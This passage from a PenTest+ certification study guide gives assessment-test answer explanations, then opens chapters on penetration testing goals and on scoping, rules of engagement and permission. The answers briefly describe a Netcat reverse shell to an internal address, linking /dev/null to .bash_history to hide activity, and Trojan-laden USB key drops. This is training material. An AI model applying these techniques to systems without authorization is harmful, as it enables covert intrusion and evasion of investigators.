. SonarQube is a static, not dynamic, software testing tool, and OllyDbg is a debugger. You'll learn more about these tools in

Chapter 9

.

B. The

.sh

file extension is commonly used for Bash scripts. PowerShell scripts usually have a

.ps1

extension. Ruby scripts use the

.rb

extension, and Python scripts end with

.py

. You'll learn more about these languages in

Chapter 12

.

C. When penetration testers discover indicators of an ongoing or past compromise, they should immediately inform management and recommend that the organization activate its cybersecurity incident response process. You'll learn more about reporting and communication in

Chapter 11

.

B. An authenticated, or credentialed, scan provides the most detailed view of the system. Unknown environment assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow. You'll learn more about authenticated scanning in

Chapter 4

.

D. Although all of these commands are useful for covering her tracks, only linking

/dev/null

to

.bash_history

will prevent the Bash history file from containing anything.

Chapters 6

and

10

cover compromising hosts and hiding your tracks.

B. It's very important to know the use and purpose of various penetration testing tools when taking the PenTest+ exam. Nikto is the best tool to meet Kaiden's needs in this scenario, since it is a dedicated web application scanning tool. Nmap is a port scanner, and Wireshark is a packet analysis tool. The Custom Wordlist Generator (CeWL) is used to spider websites for keywords. None of the latter three tools perform web application security testing. You'll learn more about Nikto in

Chapter 4

.

A. OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test.

Chapter 3

covers OSINT in more detail.

B. Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach. You will learn more about three goals of security—confidentiality, integrity, and availability—in

Chapter 1

.

B. By default, Nmap will scan the 1,000 most common ports for both TCP and UDP.

Chapter 3

covers Nmap and port scanning, including details of what Nmap does by default and how.

D. Threat hunting uses the attacker mindset to search the organization's technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian's activity clearly fits this definition. You'll learn more about threat hunting in

Chapter 1

.

A. Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell.

Chapters 6

and

10

provide information about setting up remote access once you have compromised a system.

C. This is an example of a double‐tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet. Double jumps may help video gamers, but the other two answers were made up for this question.

Chapter 7

digs into network vulnerabilities and exploits.

A. ARP spoofing attacks rely on responding to a system's ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker's system can then conduct an on‐path attack.

Chapter 7

explores on‐path attacks, methods, and uses.

D. Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester.

Chapter 8

covers social engineering and how to exploit human behaviors.

C. A USB key drop is a form of physical honeypot that can be used to tempt employees at a target organization into picking up and accessing USB drives that are distributed to places they are likely to be found. Typically one or more files will be placed on the drive that are tempting but conceal penetration testing tools that will install Trojans or remote access tools once accessed.

Chapter 8

also covers physical security attacks, including techniques like key drops.

C. The

s

in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner.

Chapter 10

discusses vulnerabilities in Linux, including how to leverage vulnerable SUID files.

D. Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois. Nmap is a useful port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry tool that has been supplanted by Process Monitor. You'll read more about OSINT in

Chapter 3

.

C. All of these commands are useful ways to determine if a system is virtualized, but

wmic

is a Windows tool. You'll learn about VM escape and detection in

Chapter 10

.

Chapter 1Penetration Testing

Hackers employ a wide variety of tools to gain unauthorized access to systems, networks, and information. Automated tools, including network scanners, software debuggers, password crackers, exploitation frameworks, and malware, do play an important role in the attacker's toolkit. Cybersecurity professionals defending against attacks should have access to the same tools in order to identify weaknesses in their own defenses that an attacker might exploit.

These automated tools are not, however, the most important tools at a hacker's disposal. The most important tool used by attackers is something that cybersecurity professionals can't download or purchase. It's the power and creativity of the human mind. Skilled attackers leverage quite a few automated tools as they seek to defeat cybersecurity defenses, but the true test of their ability is how well they are able to synthesize the information provided by those tools and pinpoint potential weaknesses in an organization's cybersecurity defenses.

What Is Penetration Testing?

Penetration testing seeks to bridge the gap between the rote use of technical tools to test an organization's security and the power of those tools when placed in the hands of a skilled and determined attacker. Penetration tests are authorized, legal attempts to defeat an organization's security controls and gain unintended access. The tests are time‐consuming and require staff who are as skilled and determined as the real‐world attackers who will attempt to compromise the organization. However, they're also the most effective way for an organization to gain a complete picture of its security vulnerability.

Cybersecurity Goals

Cybersecurity professionals use a well‐known model to describe the goals of information security. The CIA triad, shown in Figure 1.1, includes the three main characteristics of information that cybersecurity programs seek to protect:

Confidentiality

measures seek to prevent unauthorized access to information or systems.

Integrity

measures seek to prevent unauthorized modification of information or systems.

Availability

measures seek to ensure that legitimate use of information and systems remains possible.

FIGURE 1.1 The CIA triad

Attackers, and therefore penetration testers, seek to undermine these goals and achieve three corresponding goals of their own. The attackers’ goals are known as the DAD triad, shown in Figure 1.2:

Disclosure

attacks seek to gain unauthorized access to information or systems.

Alteration

attacks seek to make unauthorized changes to information or systems.

Denial

attacks seek to prevent legitimate use of information and systems.

FIGURE 1.2 The DAD triad

Chapter 2Planning and Scoping Penetration Tests

THE COMPTIA PENTEST+ EXAM OBJECTIVES COVERED IN THIS CHAPTER INCLUDE:

Domain 1: Engagement Management

1.1 Summarize pre‐engagement activities.

Scope definition

Regulations, frameworks, and standards

Privacy

Security

Rules of engagement

Exclusions

Test cases

Escalation process

Testing window

Agreement types

Non‐disclosure agreement (NDA)

Master service agreement (MSA)

Statement of work (SoW)

Terms of service (ToS)

Target selection

Classless Inter‐Domain Routing (CIDR) ranges

Domains

Internet Protocol (IP) addresses

Uniform Resource Locator (URL)

Assessment types

Web

Network

Mobile

Cloud

Application programming interface (API)

Application

Wireless

Shared responsibility model

Hosting provider responsibilities

Customer responsibilities

Penetration tester responsibilities

Third‐party responsibilities

Legal and ethical considerations

Authorization letters

Mandatory reporting requirements

Risk to the penetration tester

1.3 Compare and contrast testing frameworks and methodologies.

Open Source Security Testing Methodology Manual (OSSTMM)

Council of Registered Ethical Security Testers (CREST)

Penetration Testing Execution Standard (PTES)

MITRE ATT&CK

Open Web Application Security Project (OWASP) Top 10

OWASP Mobile Application Security Verification Standard (MASVS)

Purdue model

Threat modeling frameworks

Damage potential, Reproducibility, Exploitability, Affected users, Discoverability (DREAD)

Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege (STRIDE)

Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE)

The Engagement Management domain of the CompTIA PenTest+ certification exam objectives deals with preparing for, planning, and scoping a penetration test. In this chapter you will explore pre‐engagement activities such as setting up rules of engagement, handling paperwork such as nondisclosure agreements (NDAs), master service agreements (MSAs), and statements of work (SoWs); handling target selection; and understanding the shared responsibility model and legal and ethical considerations. You will also compare and contrast testing frameworks and methodologies such as the Open Worldwide Application Security Project and many others.

Real World Scenario

Navigating Compliance Requirements

Joanna's organization processes credit cards at multiple retail locations spread throughout a multistate area. As the security analyst for her organization, Joanna is responsible for conducting a regular assessment of the card processing environment.

Joanna's organization processes just over 500,000 transactions a year. Because the organization processes transactions, it must adhere to the Payment Card Industry Data Security Standard (PCI DSS) requirements. It also exclusively uses hardware payment terminals that are part of a PCI SSC (Security Standards Council) listed point‐to‐point encryption (P2PE) solution without cardholder data storage. That means that her organization must provide an annual Self‐Assessment Questionnaire (SAQ), have a quarterly network scan run by an approved scanning vendor (ASV), and fill out an Attestation of Compliance form. The attestation includes a requirement that the Report on Compliance be done based on the PCI DSS Requirements and Security Assessment Procedures that currently cover her company.

As a penetration tester, you need to be able to determine what requirements you may have to meet for a compliance‐based assessment. Using the information given here, can you figure out what Joanna's assessment process will require? You can start here:

https://www.pcisecuritystandards.org/document_library

A few questions to get you started:

What type of penetration test would you recommend to Joanna? Would a known environment or an unknown environment assessment be the most appropriate, and why?

How would you describe the scope of the assessment?

What rules of engagement should you specify for the production card processing systems Joanna needs to have tested?

What merchant level does Joanna's organization fall into?

What Self‐Assessment Questionnaire (SAQ) level is Joanna's company most likely covered by, and why?

What questions in the SAQ are likely to be answered NA based on the solution described?

Is Joanna's team required to perform vulnerability scans of card processing systems in her environment?

Summarizing Pre‐engagement Activities

The first step in most penetration testing engagements is determining what should be tested. When this first step is done, it can be considered the pre‐engagement activities where you can define the scope of the assessment. The scope determines what penetration testers will do and how their time will be spent.

Determining the scope requires working with the person or organization for whom the penetration test will be performed. Testers need to understand all of the following as part of the scope definition:

Why the test is being performed

Whether specific requirements such as compliance or business needs are driving the test

What systems, networks, or services should be tested and when

What information can and cannot be accessed during testing

What the rules of engagement for the test are

What techniques are permitted or forbidden

To whom the final report will be presented

Testers will also need to assess the responsibilities of all parties involved, such as hosting providers, customers, and vendors. Lastly, testers will need to understand legal and ethical considerations required for conducting tests.

The Penetration Testing Execution Standard at www.pentest-standard.org is a great resource for penetration testers. It includes information about pre‐engagement interactions like those covered in this chapter as well as detailed breakdowns of intelligence gathering, threat modeling, vulnerability analysis, exploitation and post‐exploitation activities, and reporting. The team that built it also created a technical guideline that can be useful, although some of the material is slightly dated. It's available here:

http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines

Scope Definition

When defining the scope of the test, you must consider many pre‐engagement activities. The first activity any tester should review is the regulations, frameworks, and standards that will be used when planning for and ultimately conducting your tests.

An important consideration that a tester should review is any regulatory, compliance, required frameworks and standards that should be reviewed and followed as part of the test. This could alter your scope and should be clearly understood at this juncture. For example, you may need to ensure that when running tests for a health care provider, you consider HIPAA. You must ensure that patient privacy is protected as part of your test and if you are collecting information, this information may be viewable. Another is when considering PCI and any financial compliance measures that must be followed. As part of the scope definition, make sure you are fully aware of and discuss these regulations before firming up and beginning any testing. This may result in privacy and security issues that the customer may need to consider up front before any testing begins.

When planning for your penetration test (pentest), you should begin by attempting to frame the scope of the test, which creates your boundaries and defines who will be affected, what will be tested, and what may be impacted. The scope of the test is considered the first step of your pentest and allows you, the tester, to identify internal and external technology that may be part of the test. An example would be testing a company's assets internally, but also noting that they are connected to two separate cloud providers that will also be part of the test.

Doing this will also allow you to scope what will and will not be part of the test. Using the previous example, the customer may not want you to test the external cloud providers, which will help firm up the scope of work. Doing this work up front will also help you define what type of assessment you want to conduct. Lastly, the scope definition should clearly define what is in and out of scope.

Scoping agreements and the rules of engagement must define more than just what will be tested. In fact, documenting the limitations of the test can be just as important as documenting what will be included. The testing agreement or scope documentation should contain disclaimers explaining that the test is valid only at the point in time when it is conducted and that the scope and methodology chosen can impact the comprehensiveness of the test. After all, a known environment penetration test is far more likely to find issues buried layers deep in a design than an unknown environment test of well‐secured systems!

Problem handling and resolution is another key element of the rules of engagement. Although penetration testers and clients always hope that the tests will run smoothly and won't cause any disruption, testing systems and services, particularly in production environments using actual attack and exploit tools, can cause outages and other problems. In those cases, having a clearly defined communication, notification, and escalation path on both sides of the engagement can help minimize downtime and other issues for the target organization. Penetration testers should carefully document their responsibilities and limitations of liability and ensure that clients know what could go wrong and that both sides agree on how it should be handled. This ensures that both the known and unknown impacts of the test can be addressed appropriately.

Permission

The tools and techniques we will cover in this book are the bread and butter of a penetration tester's job, but they are very likely illegal to use on another owner's equipment without permission. Before you plan (and especially before you execute) a penetration test, you must have appropriate permission. In most cases, you should be sure to have appropriate documentation for that permission in the form of a signed agreement, a memo from senior management, or a similar “get out of jail free” card from a person or people in the target organization with the rights to give you permission.

Why is it called a “get out of jail free” card? It's the document that you would produce if something went wrong. Permission from the appropriate party can help you stay out of trouble if something goes wrong.

Scoping Considerations—A Deeper Dive

As you've likely already realized, determining the detailed scope of a test can involve a significant amount of work. Even a small organization may have a complex set of systems, applications, and infrastructure, and determining the scope of a penetration test can be challenging unless the organization has detailed and accurate architecture, dataflow, and system documentation. Of course, if the engagement is an unknown environment test, the detail available to penetration testers may be limited, so they will need to know how to avoid going outside of the intended scope of the test.

Detailed scoping starts by determining the acceptable targets. Are they first party hosted (internally) or third party hosted (externally), and are they on‐site or off‐site? Are they hosted by the organization itself, by a third party, or by an infrastructure‐as‐a‐service (IaaS) or other service provider? Are they virtual, physical, or a hybrid, and does this impact the assessment? Are there specific environmental restrictions that need to be applied for the network, applications, or cloud systems and services?